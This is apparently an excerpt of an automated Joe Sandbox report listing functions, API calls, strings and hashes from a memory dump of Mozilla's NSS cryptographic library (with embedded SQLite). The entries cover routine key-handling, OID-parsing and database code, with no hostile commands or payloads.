Part of subcall function 6C76BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C76800A,00000000,?,00000000,?), ref: 6C76BC3F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 91c65418dad43efe543e8f34f10c2a82a25f04a078d2776b5488d2dca6c59d19
Instruction ID: 016a8a657461f14cc085cd2d06c5452dfeb419c295a26b7bed5279a457cf1205
Opcode Fuzzy Hash: 91c65418dad43efe543e8f34f10c2a82a25f04a078d2776b5488d2dca6c59d19
Instruction Fuzzy Hash: F2E18D706083009FE700CF2ACA84B5A77E5AF45358F144A2DEC9A9BF51E732EC49CB52

Function 6C6F1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C6F1C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C6F1C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C6F1CA1
GetLengthSid.ADVAPI32(?), ref: 6C6F1CA9
malloc.MOZGLUE(00000000), ref: 6C6F1CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C6F1CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C6F1CE4
GetLengthSid.ADVAPI32(?), ref: 6C6F1CEC
malloc.MOZGLUE(00000000), ref: 6C6F1CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C6F1D0F
CloseHandle.KERNEL32(?), ref: 6C6F1D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C6F1D4D
GetLastError.KERNEL32 ref: 6C6F1D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C6F1D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C6F1D7A

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 7cd3588a83c7830a7f3c944067765eac9367515ce4d62f4514023b7a606ad78f
Instruction ID: c9c67f6a7dbdba82e083952cb8650f053560376e6e178666f45bc1ba0681d708
Opcode Fuzzy Hash: 7cd3588a83c7830a7f3c944067765eac9367515ce4d62f4514023b7a606ad78f
Instruction Fuzzy Hash: AA3192F5A00218AFEB61AF64CC48BAA7BB8FF4E348F404075F60892211E7745994CFA5

Function 6C77C8C0 Relevance: 25.9, APIs: 17, Instructions: 432COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C77CA51
TlsGetValue.KERNEL32 ref: 6C77CAE8
EnterCriticalSection.KERNEL32(?), ref: 6C77CAFC
PK11_FreeSymKey.NSS3(00000000), ref: 6C77CB2E
PK11_KeyGen.NSS3(?,?,00000000,00000000,?), ref: 6C77CB87
memset.VCRUNTIME140(?,00000000,00000410), ref: 6C77CBA8
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C77CCCD
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C77CCE1
PK11_PubDeriveWithKDF.NSS3 ref: 6C77CD3D
memcpy.VCRUNTIME140(?,?,?), ref: 6C77CD73
memcpy.VCRUNTIME140(?,?,?), ref: 6C77CD9D
PK11_WrapSymKey.NSS3(?,00000000,?,00000000,?), ref: 6C77CDDA
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C77CE04
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C77CE17
PK11_FreeSymKey.NSS3(00000000), ref: 6C77CE24
PR_Unlock.NSS3 ref: 6C77CE49
PK11_FreeSymKey.NSS3(00000000), ref: 6C77CE96

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_$ErrorFree$Destroymemcpy$CriticalDeriveEnterPrivatePublicSectionUnlockValueWithWrapmemset
String ID:
API String ID: 3685077037-0
Opcode ID: 8c5922f6407c76fd571853f2335d769e50df134a56d01aee526550a53992d86f
Instruction ID: dd480369abc09856390c6e2d0889c96672cc99a525522a044cb7901f40ac9e8a
Opcode Fuzzy Hash: 8c5922f6407c76fd571853f2335d769e50df134a56d01aee526550a53992d86f
Instruction Fuzzy Hash: C9F1E7B1D002188BEF30EF14CE847AA73A4FF4934AF1541B9D90997B41E734DA84CBA6

Function 6C6FEF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6FEF63

Part of subcall function 6C7087D0: PORT_NewArena_Util.NSS3(00000800,6C6FEF74,00000000), ref: 6C7087E8
Part of subcall function 6C7087D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C6FEF74,00000000), ref: 6C7087FD
Part of subcall function 6C7087D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C70884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C6FF2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6FF2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C6FF30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C6FF374
PL_strcasecmp.NSS3(6C842FD4,?), ref: 6C6FF457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C6FF4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C6FF66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C6FF67D
CERT_DestroyName.NSS3(?), ref: 6C6FF68B

Part of subcall function 6C708320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C708338
Part of subcall function 6C708320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C708364
Part of subcall function 6C708320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C70838E
Part of subcall function 6C708320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7083A5
Part of subcall function 6C708320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7083E3

Part of subcall function 6C7084C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C7084D9
Part of subcall function 6C7084C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C708528

Part of subcall function 6C708900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C708955

Strings

*, xrefs: 6C6FF3C6
", xrefs: 6C6FF21B
oid., xrefs: 6C6FF2CF

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 121d336f865bcbf89ab589d1b6cf9e78f1111f325846587463e96647fffeaa03
Instruction ID: cbac7df39ebfeee0abe1dd42bbff1e7c52040bee7b97a18fa860b776f388eb4c
Opcode Fuzzy Hash: 121d336f865bcbf89ab589d1b6cf9e78f1111f325846587463e96647fffeaa03
Instruction Fuzzy Hash: 1A22297260C3414BE714CE58C4903AEB7E7AB9531CF184A2EE4E587B91EB719807C78B

Function 6C6A1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6A1D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6A1EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C6A1FB7

Strings

attached databases must use the same text encoding as main database, xrefs: 6C6A20CA
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C6A1F83
sqlite_temp_master, xrefs: 6C6A1C5C
no more rows available, xrefs: 6C6A2264
abort due to ROLLBACK, xrefs: 6C6A2223
unknown error, xrefs: 6C6A2291
table, xrefs: 6C6A1C8B
another row available, xrefs: 6C6A2287
sqlite_master, xrefs: 6C6A1C61
unsupported file format, xrefs: 6C6A2188

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: ab6f27c866c0714d8d24482bd15f8ab7e934ff8aba43479376d81436babba63d
Instruction ID: abce63c5b66c283eb9c1b49cb8c5e76a483dce90691475c42842902bd3b7df73
Opcode Fuzzy Hash: ab6f27c866c0714d8d24482bd15f8ab7e934ff8aba43479376d81436babba63d
Instruction Fuzzy Hash: 1E12DF70608341CFD710CF5AC484A5AB7F2BF85318F18896DE9998BB52D731EC4ACB96

Function 6C76EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C76C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C76DAE2,?), ref: 6C76C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C76F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C76F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C76F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C76F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C83218C), ref: 6C76F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C76F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C76F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C76F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C76F210

Part of subcall function 6C7152D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C76F1E9,?,00000000,?,?), ref: 6C7152F5
Part of subcall function 6C7152D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C71530F
Part of subcall function 6C7152D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C715326
Part of subcall function 6C7152D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C76F1E9,?,00000000,?,?), ref: 6C715340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C76F227

Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C76F23E

Part of subcall function 6C75BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C70E708,00000000,00000000,00000004,00000000), ref: 6C75BE6A
Part of subcall function 6C75BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7104DC,?), ref: 6C75BE7E
Part of subcall function 6C75BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C75BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C76F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C76F3A8

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C76F3B3

Part of subcall function 6C712D20: PK11_DestroyObject.NSS3(?,?), ref: 6C712D3C
Part of subcall function 6C712D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C712D5F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: f93af183c3cb8f545e690bbc294fd52aa113203ae0f023fb2aed19ff7ff68848
Instruction ID: f1921d62e5856ca82c9085cd785cfafc4ae1670a160467e76570c4ae976c5a11
Opcode Fuzzy Hash: f93af183c3cb8f545e690bbc294fd52aa113203ae0f023fb2aed19ff7ff68848
Instruction Fuzzy Hash: E0D16DB6E012059FDB14CFAADA84B9EB7B5EF48308F198039DD15A7B11EB31E805CB50

Function 6C74A9A0 Relevance: 21.2, APIs: 14, Instructions: 214COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C74A9CA

Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6C860B04,?), ref: 6C74A9F7

Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095

PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C74AA0B
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C74AA33
PK11_GetInternalKeySlot.NSS3 ref: 6C74AA55
PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6C74AA69
PORT_FreeArena_Util.NSS3(00000001,00000001), ref: 6C74AAD4
PK11_ListFixedKeysInSlot.NSS3(?,00000000,?), ref: 6C74AB18
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C74AB5A
PK11_FreeSymKey.NSS3(00000000), ref: 6C74AB85
PK11_FreeSymKey.NSS3(00000000), ref: 6C74AB99
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C74ABDC
PK11_FreeSymKey.NSS3(?), ref: 6C74ABE9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C74ABF7

Part of subcall function 6C74AC10: PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C74AB3E,?,?,?), ref: 6C74AC35
Part of subcall function 6C74AC10: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C74AB3E,?,?,?), ref: 6C74AC55
Part of subcall function 6C74AC10: PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C74AB3E,?,?), ref: 6C74AC70
Part of subcall function 6C74AC10: PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C74AC92
Part of subcall function 6C74AC10: PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C74AB3E), ref: 6C74ACD7

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_$Util$Free$Arena_Item_$Zfree$ArenaContextSlot$Alloc_AuthenticateBlockCipherCreateDecodeDestroyErrorFixedInitInternalKeysListLockPoolQuickSizecalloc
String ID:
API String ID: 2602994911-0
Opcode ID: fd96bab6a60bd26eef44e6de050fa661b5c938472ea670216addb56c6461ebaa
Instruction ID: faf7075adc6395aa0c7e62bb3924a197ecd787fbbbf004809121240de5cb78b4
Opcode Fuzzy Hash: fd96bab6a60bd26eef44e6de050fa661b5c938472ea670216addb56c6461ebaa
Instruction Fuzzy Hash: 1A710372A083019BE701CF299E44B9BB3A5BF84368F108A39FD6497751EB71D948C792

Function 6C68ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C68EF98

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C68F483
database corruption, xrefs: 6C68F48D
%s at line %d of [%.10s], xrefs: 6C68F492

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: c458c1413bb841aa6514dc7626eaaa8278d44447ba5efa9d346495241bd137be
Instruction ID: ce0580ade687e74ceda4241f375aa74b487c0d2b82855539988fb6294c9c2b97
Opcode Fuzzy Hash: c458c1413bb841aa6514dc7626eaaa8278d44447ba5efa9d346495241bd137be
Instruction Fuzzy Hash: B5623434A06205CFEB14CF64C48479ABBF1BF49318F18419DD9416BB92D735E886CBEA

Function 6C72FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C72FD06

Part of subcall function 6C72F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C72F696
Part of subcall function 6C72F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C72F789
Part of subcall function 6C72F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C72F796
Part of subcall function 6C72F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C72F79F
Part of subcall function 6C72F670: SECITEM_DupItem_Util.NSS3 ref: 6C72F7F0

Part of subcall function 6C753440: PK11_GetAllTokens.NSS3 ref: 6C753481
Part of subcall function 6C753440: PR_SetError.NSS3(00000000,00000000), ref: 6C7534A3
Part of subcall function 6C753440: TlsGetValue.KERNEL32 ref: 6C75352E
Part of subcall function 6C753440: EnterCriticalSection.KERNEL32(?), ref: 6C753542
Part of subcall function 6C753440: PR_Unlock.NSS3(?), ref: 6C75355B

SECITEM_DupItem_Util.NSS3(?), ref: 6C72FDAD

Part of subcall function 6C75FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C709003,?), ref: 6C75FD91
Part of subcall function 6C75FD80: PORT_Alloc_Util.NSS3(A4686C76,?), ref: 6C75FDA2
Part of subcall function 6C75FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C76,?,?), ref: 6C75FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C72FE00

Part of subcall function 6C75FD80: free.MOZGLUE(00000000,?,?), ref: 6C75FDD1

Part of subcall function 6C74E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C74E5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6C72FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C72FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C72FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C72FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C72FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C72FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C730007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C730029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C730044

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: cd5c0b4a1cf703aecc575312fafd8fe8b49c5bab884e653a2ac78b2e0092ca33
Instruction ID: 99eb797430de0041427267366979bf52d30af67e13f0dc942945d97f7a451946
Opcode Fuzzy Hash: cd5c0b4a1cf703aecc575312fafd8fe8b49c5bab884e653a2ac78b2e0092ca33
Instruction Fuzzy Hash: D8B1E371A04311AFE314CF29C944A6BF7E5FF88318F548A2DE99987A41E734E944CB91

Function 6C727D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C727DDC

Part of subcall function 6C7607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C708298,?,?,?,6C6FFCE5,?), ref: 6C7607BF
Part of subcall function 6C7607B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7607E6
Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C76081B
Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C760825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C727DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C727F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C727F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C727F98
PK11_FreeSymKey.NSS3(?), ref: 6C727FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C727FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C728000

Part of subcall function 6C749430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C727F0C,?,00000000,00000000,00000000,?), ref: 6C74943B
Part of subcall function 6C749430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C74946B
Part of subcall function 6C749430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C749546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C728110
PK11_FreeSymKey.NSS3(00000000), ref: 6C72811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C72822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C72823C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
